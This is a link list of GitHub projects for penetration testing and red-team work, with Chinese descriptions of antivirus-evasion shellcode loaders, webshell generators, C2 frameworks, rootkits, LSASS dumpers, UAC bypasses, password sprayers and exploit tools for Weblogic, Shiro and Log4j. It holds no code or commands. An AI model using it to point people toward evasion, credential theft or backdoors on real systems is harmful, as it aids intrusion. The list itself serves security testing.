- [Anti-Virus-PHP:【随机动态生成】php免杀webshell](https://github.com/JZY-nuist/Anti-Virus-PHP)
- [DarkEye:渗透测试情报收集工具](https://github.com/b1gcat/DarkEye)
- [Ortau:一个用于隐藏C2的、开箱即用的反向代理服务器](https://github.com/ort4u/Ortau)
- [Shack2ToolsWithoutBackdoor:去掉获取系统信息回传到www.shack2.org的工具](https://github.com/NS-Sp4ce/Shack2ToolsWithoutBackdoor)
- [theHarvester:邮件、子域和雇员、开放端口等信息](https://github.com/laramies/theHarvester)
- [PowerRemoteDesktop:通过PowerShell连接远程桌面](https://github.com/DarkCoderSc/PowerRemoteDesktop)
- [Auto_proxy:利用IP地址池进行自动切换Http代理,防止IP封禁](https://github.com/Mustard404/Auto_proxy)
- [snakeyaml-memshell:springboot跨线程注入内存马](https://github.com/passer-W/snakeyaml-memshell)
- [fastjson-c3p0:fastjson不出网利用、c3p0](https://github.com/depycode/fastjson-c3p0)
- [awsKeyTools:aws云平台 accessKey 泄漏利用工具](https://github.com/Aabyss-Team/awsKeyTools)
- [goqifrp:frp的修改版-去除特征流量免杀信息隐藏](https://github.com/Goqi/goqifrp)
- [Diamorphine:LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)](https://github.com/m0nad/Diamorphine)
- [Gobypass:golang 加载器免杀](https://github.com/huadema/Gobypass)
- [frp-modify:frp0.38.1 支持域前置、远程加载配置文件、配置文件自删除、流量特征修改](https://github.com/atsud0/frp-modify)
- [Ruoyi-All:若依后台定时任务一键利用](https://github.com/passer-W/Ruoyi-All)
- [VulScanner:一款适合在渗透测试中随时记录和保存的漏洞检测工具](https://github.com/passer-W/VulScanner)
- [FinalShell-Decoder:FinallShell 密码解密GUI工具](https://github.com/passer-W/FinalShell-Decoder)
- [Decrypt_Weblogic_Password:绝大部分weblogic解密方式](https://github.com/TideSec/Decrypt_Weblogic_Password)
- [SpringExploit:spring 系列漏洞检测工具](https://github.com/SummerSec/SpringExploit)
- [nanodump:A crappy LSASS dumper with no ASCII art](https://github.com/helpsystems/nanodump)
- [dynascan:动态敏感文件扫描器,实现动态字典渲染、动态结果判断、自动命中记录、的敏感文件扫描器](https://github.com/winezer0/dynascan)
- [ExploitDepository:一个花里胡哨的Exploit运行框架](https://github.com/ca3tie1/ExploitDepository)
- [collision-webshell:制作相同 MD5的 webshell 文件绕过基于缓存文件 webshell 检测](https://github.com/phith0n/collision-webshell)
- [KDStab:a Beacon Object File combined implementation of Yaxser's Backstab and pwn1sher's KillDefender for use with Cobalt Strike](https://github.com/Octoberfest7/KDStab)
- [DumpSMBShare:通过 SMB 共享下载文件和文件夹](https://github.com/p0dalirius/DumpSMBShare)
- [stunner:a tool to test and exploit STUN, TURN and TURN over TCP servers](https://github.com/firefart/stunner)
- [Aopo:内网自动化快速打点工具|资产探测|漏洞扫描|服务扫描|弱口令爆破](https://github.com/ExpLangcn/Aopo)
- [commix:命令注入自动化检测工具](https://github.com/commixproject/commix)
- [awesome-cloud-security:收集一些国内外不错的云安全资源,主要是国内](https://github.com/teamssix/awesome-cloud-security)
- [JavaFileDict:Java应用的一些配置文件字典,来源于公开的字典与平时收集](https://github.com/f0ng/JavaFileDict)
- [RedisEXP:Redis 漏洞利用工具](https://github.com/yuyan-sec/RedisEXP/tree/5e61d700eb389c65436fb95fd8baad9943352bbe)
- [reverse-shell-generator:各种反弹 shell 格式在线生成](https://github.com/0dayCTF/reverse-shell-generator)
- [another-tmp-mailbox:部署在线匿名邮箱服务](https://github.com/rev1si0n/another-tmp-mailbox)
- [ELFLoader:在内存中加载或者运行 ELF 对象的通用工具](https://github.com/trustedsec/ELFLoader)
- [DInjector:shellcode 注入技术集合](https://github.com/snovvcrash/DInjector)
- [CS-Remote-OPs-BOF:通过CS 的远程BOF 文件来实现各种实用功能](https://github.com/trustedsec/CS-Remote-OPs-BOF)
- [shiro-framework:shiro 漏洞检测利用工具](https://github.com/dream0x01/shiro-framework)
- [shiro_killer:shiro 漏洞批量检测工具](https://github.com/Peony2022/shiro_killer)
- [weblogic-framework:weblogic漏洞检测利用工具](https://github.com/dream0x01/weblogic-framework)
- [GoRottenTomato:Go实现部分Rubeus功能,可执行asktgt, asktgs, s4u, describe ticket, renew ticket, asreproast等](https://github.com/1ight-2020/GoRottenTomato)
- [Struts2Scanner:一款Golang编写的Struts2漏洞检测和利用工具,支持并发批量检测](https://github.com/1ight-2020/Struts2Scanner)
- [RuijieRCE:锐捷Ruijie Networks RCE漏洞检测工具,可批量检测上菜刀、冰蝎、哥斯拉](https://github.com/1ight-2020/RuijieRCE)
- [natpass:支持web vnc和web shell的远程管理工具](https://github.com/jkstack/natpass)
- [SigFlip:修改已经签名的PE文件且不破坏签名的工具](https://github.com/med0x2e/SigFlip)
- [supplier:主流供应商的一些攻击性漏洞汇总](https://github.com/r0eXpeR/supplier)
- [PPLDump_BOF:PPLdump项目的BOF 移植,dump 指定进程](https://github.com/EspressoCake/PPLDump_BOF)
- [SharpWSUS:通过 Windows 升级服务来进行横向移动的CSharp工具](https://github.com/nettitude/SharpWSUS)
- [NSNGFW-RCE-POC_EXP:NSNGFW网康下一代防火墙RCE 漏洞批量检测&利用&批量getshell](https://github.com/S0por/NSNGFW-RCE-POC_EXP)
- [A-collection-of-configuration-file-paths:国内各种软件的配置文件目录](https://github.com/testfdasfsdff/A-collection-of-configuration-file-paths)
- [nosferatu:Windows NTLM验证后门](https://github.com/kindtime/nosferatu)
- [takeover:子域名接管漏洞扫描工具](https://github.com/m4ll0k/takeover)
- [subdomain-takeover:子域名接管扫描工具](https://github.com/antichown/subdomain-takeover)
- [Chunk-Proxy:通过 http chunk 传输代理(类似 reGeorg)](https://github.com/BeichenDream/Chunk-Proxy)
- [NtCreateUserProcess:通过NtCreateUserProcess() APi 创建进程](https://github.com/capt-meelo/NtCreateUserProcess)
- [shiro-550-with-NoCC: Shiro-550 不依赖CC链利用工具](https://github.com/dr0op/shiro-550-with-NoCC)
- [14Finger:基于vue3+django前后端分离,功能齐全的Web指纹扫描和分享平台](https://github.com/b1ackc4t/14Finger)
- [rotateproxy:利用fofa搜索socks5开放代理进行代理池轮切的工具](https://github.com/akkuman/rotateproxy)
- [Auto_proxy:利用IP地址池进行自动切换Http代理,防止IP封禁](https://github.com/Mustard404/Auto_proxy)
- [Aazhen-v3.1:自研JavaFX图形化漏洞扫描工具,支持ThinkPHP 2.x RCE,Thinkphp5 5.0.22/5.1.29RCE,ThinkPHP5 5.0.23RCE和ThinkPHP5 SQL注入漏洞和敏感信息泄露漏洞的漏洞检测,以及命令执行的功能](https://github.com/zangcc/Aazhen-v3.1)
- [MS17010_AllInOne:MS7010 利用工具,功能包括自动探测主机系统类型 -> 选择合适的EXP并利用 -> 植入后门 -> 创建后门自启服务 -> 创建系统账号 -> 开放后门监听端口](https://github.com/weizn11/MS17010_AllInOne)
- [All-Defense-Tool:优秀开源攻防项目集合](https://github.com/guchangan1/All-Defense-Tool)
- [RedGuard:一款C2设施前置流量控制技术的衍生作品](https://github.com/wikiZ/RedGuard)
- [gomasscan:gomasscan是一个纯go编写的masscan扫描库](https://github.com/lcvvvv/gomasscan)
- [cdnlookup:一个使用 Edns-Client-Subnet(ECS) 遍历智能CDN节点IP地址的工具](https://github.com/burpheart/cdnlookup)
- [DefaultCreds-cheat-sheet:默认账号密码列表](https://github.com/ihebski/DefaultCreds-cheat-sheet)
- [riskscanner:开源的多云安全合规扫描平台,基于 Cloud Custodian 和 Nuclei 引擎,实现对主流公(私)有云资源的安全合规扫描和漏洞扫描](https://github.com/riskscanner/riskscanner)
- [Mythic:一个协作、多平台、红队的框架](https://github.com/its-a-feature/Mythic)
- [BlastWithCaptcha:验证码识别 爆破 本地ocr 多线程爆破](https://github.com/AbelChe/BlastWithCaptcha)
- [python-shellcode-loader:python免杀shellcode加载器 加密混淆](https://github.com/HZzz2/python-shellcode-loader)
- [go-shellcode-loader:GO免杀shellcode加载器混淆AES加密](https://github.com/HZzz2/go-shellcode-loader)
- [ThinkphpGUI:Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell和日志泄露检查](https://github.com/Lotus6/ThinkphpGUI)
- [webprobe:一款快速探测web存活并获取title的工具](https://github.com/damit5/webprobe)
- [CHAOS:开源远控管理工具](https://github.com/tiagorlampert/CHAOS)
- [gitdorks_go:一款在github上发现敏感信息的自动化收集工具](https://github.com/damit5/gitdorks_go)
- [ScareCrow:一款为bypass EDR的框架](https://github.com/optiv/ScareCrow)
- [InCloud:运行于GitHub Actions 的仓库中自动化、自定义和执行软件开发工作流程,定制好十种针对网段和域名的不同场景的信息收集与漏洞扫描流程](https://github.com/inbug-team/InCloud)
- [Log4j_RCE_Tool:Log4j 多线程批量检测利用工具](https://github.com/inbug-team/Log4j_RCE_Tool)
- [np:解析、去重和查询多个端口扫描的工具](https://github.com/leesoh/np)
- [Nidhogg:一款适用于红队的一体化简单易用的 rootkit](https://github.com/Idov31/Nidhogg)
- [KillDefender:通过删除其令牌特权并降低令牌完整性来杀掉defender](https://github.com/pwn1sher/KillDefender)
- [KillDefender_BOF:KillDefender的BOF 实现](https://github.com/Octoberfest7/KillDefender_BOF)
- [fscan-POC:强化fscan的漏扫POC库](https://github.com/chaosec2021/fscan-POC)
- [Krakatau:Java 反编译器、汇编器和反汇编器](https://github.com/Storyyeller/Krakatau)
- [heartsk_community:Hearts K-企业资产发现与脆弱性检查工具,自动化资产信息收集与漏洞扫描](https://github.com/yqcs/heartsk_community)
- [URLFinder:类似JSFinder的golang实现,更快更全更舒服](https://github.com/pingc0y/URLFinder)
- [Memoryshell-JavaALL:收集内存马打入方式](https://github.com/achuna33/Memoryshell-JavaALL)
- [codeql_compile:自动反编译闭源应用,创建codeql数据库](https://github.com/ice-doom/codeql_compile)
- [SerializationDumper:一种以更易读的形式转储 Java 序列化流的工具](https://github.com/NickstaDB/SerializationDumperc)
- [ThunderSearch:闪电搜索器,GUI图形化渗透测试信息搜集工具](https://github.com/xzajyjs/ThunderSearch)
- [TerminalController:windows/linux 远程管理:屏幕监控、键盘记录、文件管理、命令执行、内网穿透、socks5](https://github.com/mycve/TerminalController)
- [bypassAV:免杀 defender 360 cobalstrike shellcode](https://github.com/mycve/bypassAV)
- [steganography:golang 编写的图片隐写工具库](https://github.com/auyer/steganography)
- [des.hex-encodefile:Golang:采用随机deskey和hex进行文件加密,常用于加密shellcode](https://github.com/TryHello/des.hex-encodefile)
- [go-shellcode-webimg-load:golang shellcode loader 远程图片隐写加载执行 无文件落地](https://github.com/TryHello/go-shellcode-webimg-load)
- [C2_Demo:golang+c#乱写了一个基于http的垃圾远控(支持团队协同作战,功能很少)(三端)](https://github.com/TryHello/C2_Demo)
- [multiplexing_port_socks5:一款golang写的支持http与socks5的端口复用小工具,并且可以开启socks5代理](https://github.com/TryHello/multiplexing_port_socks5)
- [MateuszEx:bypass AV生成工具,目前免杀效果不是很好了,但是过个360,火绒啥的没问题](https://github.com/sairson/MateuszEx)
- [PyC2:通过python实现的简易版c2](https://github.com/1derian/PyC2)
- [go-nc:使用go语言实现nc的命令执行, 完美解决tcp粘包](https://github.com/1derian/go-nc)
- [ElecFuzz:电器协议 fuzz 工具](https://github.com/M-Kings/ElecFuzz)
- [Caesium:JAVA 字节码混淆工具](https://github.com/sim0n/Caesium)
- [Chromium-based-XSS-Taint-Tracking:Cyclops 是一款具有 XSS 检测功能的浏览器](https://github.com/v8blink/Chromium-based-XSS-Taint-Tracking)
- [Khepri:使用Golang和C++编写类似CobaltStrike的后渗透工具,免费、开源、跨平台C2工具](https://github.com/geemion/Khepri)
- [BiFang:自动化生成loader,实现加密、混淆、bypass沙箱、多种现有进程注入技术,动态编译生成](https://github.com/MicrobBlue/BiFang)
- [MoreFind:一款用于快速导出URL、Domain和IP的命令行小工具](https://github.com/mstxq17/MoreFind)
- [Bypass_AV:Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender](https://github.com/Axx8/Bypass_AV)
- [BypassAV_Script:绕过杀软学习的项目](https://github.com/komomon/BypassAV_Script)
- [SXF_aTrust_sandbox_bypass:深信服零信任沙箱逃逸](https://github.com/DaxiaSec/SXF_aTrust_sandbox_bypass)
- [PHP-Vuln:PHP漏洞靶场,涉及OWASP TOP10漏洞](https://github.com/Wileysec/PHP-Vuln)
- [Remote_ShellcodeLoader:远程shellcode加载&权限维持+小功能](https://github.com/LDrakura/Remote_ShellcodeLoader)
- [subDomainsBrute:高并发的DNS暴力(子域名)枚举工具](https://github.com/lijiejie/subDomainsBrute)
- [PostConfluence:哥斯拉Confluence后渗透插件 MakeToken SearchPage ListAllUser AddAdminUser ListAllPage](https://github.com/BeichenDream/PostConfluence)
- [evilarc:创建带目录创越的zip/tar 压缩包](https://github.com/ptoomey3/evilarc)
- [DDexec:一种在 Linux 上无文件且隐秘地运行二进制文件的技术,使用 dd 将 shell 替换为另一个进程](https://github.com/arget13/DDexec)
- [Bypass_WindowsDefender](https://github.com/Ryze-T/Bypass_WindowsDefender)
- [iprange:计算Ip 范围](https://github.com/ffffffff0x/iprange)
- [DictGenerate:使用Go语言编写的社工字典生成器](https://github.com/seventh-letter/DictGenerate)
- [scan4all:基于优化后的vscan,继续走更多集成、自动化功能,开源、轻量、快速、跨平台 的网站漏洞扫描工具](https://github.com/hktalent/scan4all)
- [PwdBUD:一款SRC密码生成工具,尝试top字典无果后,可以根据域名、公司名等因素来生成特定的字典](https://github.com/sry309/PwdBUD)
- [MYExploit:一款扩展性高的渗透测试框架渗透测试框架](https://github.com/achuna33/MYExploit)
- [ysoserial:魔改版ysoserial,支持更多更全的利用链+内存马+防御绕过+MSF/CS 上线](https://github.com/su18/ysoserial)
- [PowerRunAsSystem:通过已有 system 权限进程来启动一个新的以 system 权限运行的 PowerShell 脚本](https://github.com/DarkCoderSc/PowerRunAsSystem)
- [Ekko:一种使用 CreateTimerQueueTimer 将执行 Sleep 混淆的 ROP 链排队的小型 sleep 混淆技术](https://github.com/Cracked5pider/Ekko)
- [bypassuac](https://github.com/liuxigu/bypassuac)
- [ActuatorExploit:SpringBoot Actuator未授权自动化利用,支持信息泄漏/RCE](https://github.com/LFYSec/ActuatorExploit)
- [SharpMapExec:CrackMapExec的C#实现版本](https://github.com/cube0x0/SharpMapExec)|[CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具](https://github.com/byt3bl33d3r/CrackMapExec)
- [MiniDump:用C# 实现的dump lsass 进程工具](https://github.com/cube0x0/MiniDump)
- [KrbRelay:Kerberos中继框架](https://github.com/cube0x0/KrbRelay)
- [CurveBall:CVE-2020-0601 ECC证书欺骗漏洞利用工具](https://github.com/ly4k/CurveBall)
- [WaterDragon:水龙:用Github Action实现IP代理功能](https://github.com/sh3d0ww01f/WaterDragon)
- [SharpFrp:FRP 修改版,配置文件不落地](https://github.com/Conyon1/SharpFrp)
- [TaskSchedulerMisc:通过IElevatedFactoryServer 对象达到 UAC Bypass 获取 system 权限](https://github.com/zcgonvh/TaskSchedulerMisc)
- [Awesome-POC:一个各类漏洞POC知识库](https://github.com/Threekiii/Awesome-POC)
- [fc-proxy:利用阿里云函数当作代理池](https://github.com/lyc8503/fc-proxy)
- [Serein:一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具](https://github.com/W01fh4cker/Serein)
- [freeBokuLoader:一个简单的 BOF,它试图释放存储用户定义反射加载器的内存区域](https://github.com/S4ntiagoP/freeBokuLoader)
- [ThreadStackSpoofer:线程堆栈欺骗,以此达到欺骗 AV 检查和分析注入的 shellcode](https://github.com/mgeeky/ThreadStackSpoofer)
- [quiltflower:强调反编译后的代码质量和准确的现代 JAVA 反编译器](https://github.com/QuiltMC/quiltflower)
- [WinPacketsEdit:用C#开发的仿 WPE 的封包拦截器,可以抓取指定进程的数据包](https://github.com/x-nas/WinPacketsEdit)
- [iomoath/SharpSpray:Active Directory密码喷洒工具。自动获取用户列表并避免潜在的锁定](https://github.com/iomoath/SharpSpray)
- [SharpSpray:域内密码喷射工具](https://github.com/JDArmy/SharpSpray)
- [SharpSpray:一个简单用LDAP对域的所有用户执行密码喷射攻击,并与Cobalt Strike兼容。](https://github.com/jnqpblc/SharpSpray)
- [TokenPlayer:操纵和滥用Windows访问令牌,以达到令牌模拟、窃取、提权、bypass UAC、派生、执行 EXE等操作](https://github.com/S1ckB0y1337/TokenPlayer)
- [【免杀】nim_shellloader:nim 免杀,支持远程、本地、命令行加载 shellcode](https://github.com/sh3d0ww01f/nim_shellloader)
- [injection:Windows 线程注入方法](https://github.com/odzhan/injection)
- [e9patch:一个强大的静态二进制重写工具](https://github.com/GJDuck/e9patch)
- [Plog:仅用于提取登录密码的 Mimikatz(免杀大多数 AV)](https://github.com/GamehunterKaan/Plog)
- ~~[ShellcodeLoader:绕过防病毒软件的Shellocde加载器【2022.10.20被发现release文件投毒】](https://github.com/ByPassAVTeam/ShellcodeLoader)~~
- [iisScaner:多线程批量检测IIS短文件名漏洞+漏洞利用](https://github.com/VMsec/iisScaner)
- [Alphalog:DNSLog、httplog、rmilog、ldaplog、jndi 等都支持](https://github.com/AlphabugX/Alphalog)
- [DHook:DHook是一个交互式自定义动态hook的工具。通过javaagent+ASM技术对运行时的java应用进行字节码修改,并可以以界面和配置文件的方式来增加hook点,修改执行方法的返回值以及参数等。如破解cs等](https://github.com/keven1z/DHook)
- [waybackurls:通过在web.archive.org、virustotal.com和commoncrawl.org上获取域名所有域名的 URL](https://github.com/tomnomnom/waybackurls)
- [AlternativeShellcodeExec:通过回调函数执行 shellcode](https://github.com/aahmad097/AlternativeShellcodeExec)
- [PE-infector:将 shellcode 注入exe 文件,目前只支持32位程序](https://github.com/MastMind/PE-infector)
- [MSSQL-Pentest-Cheatsheet:MSSQL渗透测试备忘录](https://github.com/Ignitetechnologies/MSSQL-Pentest-Cheatsheet)
- [dismember:扫描内存里敏感内容,其实就是类似 OD的内存字符串搜索](https://github.com/liamg/dismember)
- [Nimcrypt2:用 nim编写shellcodeloader或者打包](https://github.com/icyguider/Nimcrypt2)
- [Mangle:修改已编译的EXE 或者 DLL 文件用以绕过EDR检查](https://github.com/optiv/Mangle)
- [Bridge:无回显漏洞测试辅助平台,平台使用Java编写,提供DNSLOG,HTTPLOG等功能](https://github.com/SPuerBRead/Bridge)
- [badflare:查找 cloudflare 网站背后的真实 IP](https://github.com/LeeBrotherston/badflare)
- [MalSeclogon:一个使用 Seclogon 服务的小工具,支持Dump lsass、句柄欺骗、句柄克隆](https://github.com/antonioCoco/MalSeclogon)
- [WindTerm:专业的跨平台 SSH/Sftp/Shell/Telnet/Serial 终端](https://github.com/kingToolbox/WindTerm)
- [WEF:WIFI 攻击框架](https://github.com/D3Ext/WEF)
- [SharpRDPBatch:批量检查远程桌面密码或ntlm是否正确](https://github.com/1y0n/SharpRDPBatch)
- [Caesar:一个全新的敏感文件发现工具](https://github.com/0ps/Caesar)
- [SMB-Session-Spoofing:SMB会话欺骗蜜罐](https://github.com/Sq00ky/SMB-Session-Spoofing)
- [JavaDeserialize-Note:Tomcat内存马、XStream、Fastjson、Weblogic T3安全笔记](https://github.com/BMSK1994/JavaDeserialize-Note)
- [SQLRecon:一个 C# MS SQL 工具包,专为进攻性侦察和后期利用而设计](https://github.com/skahwah/SQLRecon)
- [toolset:免杀小小工具集](https://github.com/akkuman/toolset)
- [EvilEye:它用于从内存中检测cobaltstrike信标并提取一些配置](https://github.com/akkuman/EvilEye)
- [bypassAVNote:免杀死亡笔记](https://github.com/a1phaboy/bypassAVNote)
- [crackHashList:爆破fastjson1.2.42版本之后的hash黑名单](https://github.com/a1phaboy/crackHashList)
- [MenoyGone:DOS 攻击 cobaltstrike 服务器](https://github.com/a1phaboy/MenoyGone)
- [sx:快速、现代、易于使用的扫描器](https://github.com/v-byte-cpu/sx)
- [JPGtoMalware:制作 JPG 木马](https://github.com/abdulkadir-gungor/JPGtoMalware)
- [rpcfirewall:RPC 防火墙](https://github.com/zeronetworks/rpcfirewall)
- [RMI-Memory:rmi打内存马工具,适用于目标用不了ldap的情况](https://github.com/novysodope/RMI-Memory)
- [Whisker:一个 C# 工具,用于通过操作其 msDS-KeyCredentialLink 属性来接管 Active Directory 用户和计算机帐户,从而有效地将“影子凭据”添加到目标帐户](https://github.com/eladshamir/Whisker)
- [CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)
- [Red-Teaming-TTPs:红蓝队技巧](https://github.com/RoseSecurity/Red-Teaming-TTPs)
- [BOF.NET:A .NET Runtime for Cobalt Strike's Beacon Object Files](https://github.com/CCob/BOF.NET)
- [memit:在 Linux 中直接从内存中运行二进制文件](https://github.com/liamg/memit)
- [DCSec:域控安全one for all](https://github.com/JDArmy/DCSec)
- [rust-windows-shellcode](https://github.com/b1tg/rust-windows-shellcode)
- [Anti-Virus-PHP:【随机动态生成】php免杀webshell](https://github.com/JZY-nuist/Anti-Virus-PHP)
- [Webshell_Generate:用于生成各类免杀webshell](https://github.com/cseroad/Webshell_Generate)
- [C2concealer:生成用于 Cobalt Strike 的随机 C2 可延展配置文件](https://github.com/FortyNorthSecurity/C2concealer)
- [gost:golang 写的隧道](https://github.com/go-gost/gost)
- [wsMemShell:一种全新的内存马](https://github.com/veo/wsMemShell)
- [WeblogicExploit-GUI:Weblogic漏洞利用图形化工具 支持注入内存马、一键上传webshell、命令执行](https://github.com/sp4zcmd/WeblogicExploit-GUI)
- [BOF-RegSave:使用BOF转储 SAM / SECURITY / SYSTEM 注册表配置单元](https://github.com/EncodeGroup/BOF-RegSave)
- [SharpToken:.NET版本的incognito,具有以下功能:枚举Token、从指定进程枚举Token、获得交互式shell、获取命令执行结果(webshell下执行)](https://github.com/BeichenDream/SharpToken)
- [qsocks:基于 quic 的 socks5代理工具](https://github.com/net-byte/qsocks)
- [CallStackSpoofer:用于在进行系统调用时欺骗任意调用堆栈的 PoC 实现(例如,通过 NtOpenProcess 获取句柄)](https://github.com/countercept/CallStackSpoofer)
- [cf:云环境利用框架 Cloud Exploitation Framework 方便红队人员在获得 AK 的后续工作](https://github.com/teamssix/cf)
- [chatViewTool:基于Java实现的图形化微信聊天记录解密查看器](https://github.com/Ormicron/chatViewTool)
- [BCELCodeman:BCEL编码/解码](https://github.com/f1tz/BCELCodeman)
- [DotNetAnywhere:小型 .NET 解释器](https://github.com/chrisdunelm/DotNetAnywhere)
- [GoSmbExec:横向移动工具SMBExec的 golang 版本实现](https://github.com/latortuga71/GoSmbExec)
- [Malleable-C2-Randomizer:随机生成 cobaltstrike 的C2配置文件,以降低被标记和发现的概率](https://github.com/bluscreenofjeff/Malleable-C2-Randomizer)
- [kdmapper:KDMapper 是一个简单的工具,它利用 iqvw64e.sys 英特尔驱动程序在内存中手动映射未签名的驱动程序](https://github.com/TheCruZ/kdmapper)
- [hue-hive-rce:使用 Hive 劫持 Hadoop 集群](https://github.com/0xBADBAC0N/hue-hive-rce)
- [sRDI:反射 DLL 注入的 Shellcode 实现,将 DLL 转换为与位置无关的 shellcode](https://github.com/monoxgas/sRDI)
- [Awesome-RCE-techniques:在各种应用程序上实现远程代码执行的步骤和技术](https://github.com/p0dalirius/Awesome-RCE-techniques)
- [ones:可用于多个网络资产测绘引擎 API 的命令行查询工具](https://github.com/ffffffff0x/ones)
- [shellcode:免杀 shellcode](https://github.com/9bie/shellcode)
- [exe2shellcode:远程下载并在内存中执行 shellcode 的框架](https://github.com/9bie/exe2shellcode)
- [fscan-Intranet:fscan的内网修改版](https://github.com/zhibx/fscan-Intranet)
- [mandibule:一个允许将 ELF 文件注入远程进程的程序](https://github.com/ixty/mandibule)
- [ReflectiveSOInjection:反射 SO 注入是一种库注入技术,其中采用反射编程的概念将库从内存加载到主机进程中](https://github.com/infosecguerrilla/ReflectiveSOInjection)
- [sshdHooker:注入SSHD进程并记录ssh登录的密码](https://github.com/9bie/sshdHooker)
- [go-cdn2proxy:使用 websocket 通过 CDN 代理您的 C2 流量](https://github.com/jm33-m0/go-cdn2proxy)
- [crayfish:更优美、更快速、更全面的渗透测试信息收集工具【闭源】](https://github.com/feitu-dev/crayfish)
- [attackRmi:使用socket直接发送数据包来攻击rmi](https://github.com/waderwu/attackRmi)
- [IDiagnosticProfileUAC:另一个 bypass UAC 的工具](https://github.com/Wh04m1001/IDiagnosticProfileUAC)
- [csharp-ShellcodeLoader:基于csharp实现的免杀shellcode加载器](https://github.com/Ormicron/csharp-ShellcodeLoader)
- [gost:GO语言实现的安全隧道](https://github.com/ginuerzh/gost)
- [glint:一款基于浏览器爬虫golang开发的web漏洞主动(被动)扫描器](https://github.com/wrenchonline/glint)
- [addMemShellsJSP:通过jsp注入valve内存马,可以忽略框架影响,通用tomcat789](https://github.com/Ghost2097221/addMemShellsJSP)
- [GarBageTools-public:支持致远、蓝凌、万户、帆软报表、fastjson、el表达式shell等功能的漏洞利用工具](https://github.com/Ghost2097221/GarBageTools-public)
- [NoNetCmdEcho-FileW.e:应对渗透中极限环境下命令回显 & 文件落地](https://github.com/Dr-S1x17/NoNetCmdEcho-FileW.e)
- [DnslogCmdEcho:命令执行不回显但DNS协议出网的命令回显场景解决方案](https://github.com/sv3nbeast/DnslogCmdEcho)|[HexDnsEchoT: DnslogCmdEcho修改版](https://github.com/A0WaQ4/HexDnsEchoT)
- [Goal:Goal Go Red-Team 工具类](https://github.com/code-scan/Goal)
- [Frp:魔改版 FRP 更加适合红对作战使用](https://github.com/DongHuangT1/Frp)
- [Shellcode-Loader:动态加载 shellcode](https://github.com/ReversingID/Shellcode-Loader)
- [manjusaka:牛屎花 一款C2远控](https://github.com/YDHCUI/manjusaka)
- [Chisel-Strike:使用.NET 的 XOR 加密实现适用于 cobalt strike的 socks5代理工具](https://github.com/m3rcer/Chisel-Strike)
- [socks5lb:socks5代理负载均衡工具](https://github.com/mingcheng/socks5lb)
- [foxmail_password_recovery:解密 Foxmail 保存在本地的密码](https://github.com/ryoii/foxmail_password_recovery)
- [backupGen:根据域名生成备份文件字典(不扫描)](https://github.com/damit5/backupGen)
- [antiVirusCheck:cobaltstrike 直接判断目标beacon存在的杀软](https://github.com/thekingofsex/antiVirusCheck)
- [PetitPotam:强制 Windows 通过MS-EFSRPC EfsRpcOpenFileRaw同其他机器进行认证](https://github.com/topotam/PetitPotam)
- [AMSI-Unchained:通过修补提供程序未受监控的内存空间来取消对AMSI的锁定](https://github.com/deepinstinct/AMSI-Unchained)
- [haxx:在 iOS 14 - iOS 14.8.1 上以 root 身份不受限制 + 未沙盒化代码执行](https://github.com/asdfugil/haxx)
- [BeaconEye:搜寻 CobaltStrike 信标并记录操作员命令输出](https://github.com/CCob/BeaconEye)
- [KillDriverProtect:关闭恶意驱动的文件和注册表保护](https://github.com/jxust-xiaoxiong/KillDriverProtect)
- [rust-addUser:windows 添加管理员--Rust版本](https://github.com/Ryze-T/rust-addUser)
- [ServerUntrustAccount:Active Directory 域持久性技术](https://github.com/Stealthbits/ServerUntrustAccount)
- [Jlaive:.NET/Native (x64) 可执行文件的防病毒规避工具](https://github.com/ch2sh/Jlaive)
- [BokuLoader:Cobalt Strike反射加载 loader](https://github.com/boku7/BokuLoader)
- [Koh:用C#实现的通过 BOF 文件来窃取目标的 token 和登录 session](https://github.com/GhostPack/Koh)
- [go-domain-suffix-trie:域名后缀树](https://github.com/CC11001100/go-domain-suffix-trie)
- [GoBP:golang 编写的 shellcode 免杀生成器](https://github.com/awsaaaq/GoBP)
- [MS17-010:纯 golang 实现ms17-010利用工具](https://github.com/For-ACGN/MS17-010)
- [Searpy:URL采集、Favicon哈希值查找真实IP、子域名查找](https://github.com/j3ers3/Searpy)
- [iscsicpl_bypassUAC:UAC bypass for x64 Windows 7 - 11](https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC)|[iscsicpl_bypassUAC无弹窗版](https://github.com/zha0gongz1/iscsicpl_bypassUAC)
- [macos_shell_memory:通过CGO 在Macos内存中执行二进制文件](https://github.com/djhohnstein/macos_shell_memory)
- [HVVExploitApply:使用JAVAFX图形化界面检测对HVV中常见的重点CMS系统和OA系统的已公开的漏洞进行验证](https://github.com/ExpLangcn/HVVExploitApply)
- [CVE-2020-14882_Exploit_Gui:Weblogic 未授权命令执行漏洞GUI 利用工具](https://github.com/nice0e3/CVE-2020-14882_Exploit_Gui)
- [FragmentTransmission:适用于woodpecker-framework漏洞利用框架的FragmentTransmission分块传输插件](https://github.com/nice0e3/FragmentTransmission)
- [websocket_tunnel:将tcp连接转为websocket连接使其可以通过cdn传输 支持域前置技术以隐藏域名](https://github.com/yu1745/websocket_tunnel)
- [在线二进制分析](https://dogbolt.org/)|[项目地址](https://github.com/decompiler-explorer/decompiler-explorer)
- [IPWarden:IPWarden是一个IP资产风险发现工具](https://github.com/EnnioX/IPWarden)
- [NetLoader:在内存中加载任何c#二进制文件且绕过AMSI 和ETW](https://github.com/Flangvik/NetLoader)
- [SharpSniper:通过用户名和登录 IP地址在AD 中查找特定用户](https://github.com/HunnicCyber/SharpSniper)
- [NiceKatz:又一个不错的进程 dump 转存工具](https://github.com/0xDeku/NiceKatz)
- [MiniDump:C#实现的进程 dump 工具,支持 CS 内存加载(execute-assembly)](https://github.com/Mr-Un1k0d3r/MiniDump)
- [EasyFrp:FRP GUI 版本实现](https://github.com/Skyxmao/EasyFrp)
- [thinkphp-log-analyse:ThinkPHP日志分析](https://github.com/mrknow001/thinkphp-log-analyse)
- [Hyuga:一个用来监控带外(Out-of-Band)流量的工具](https://github.com/Buzz2d0/Hyuga)
- [SharpEventLog:c# 读取登录过本机的登录失败或登录成功(4624,4625)的所有计算机信息,在内网渗透中快速定位运维管理人员](https://github.com/uknowsec/SharpEventLog)
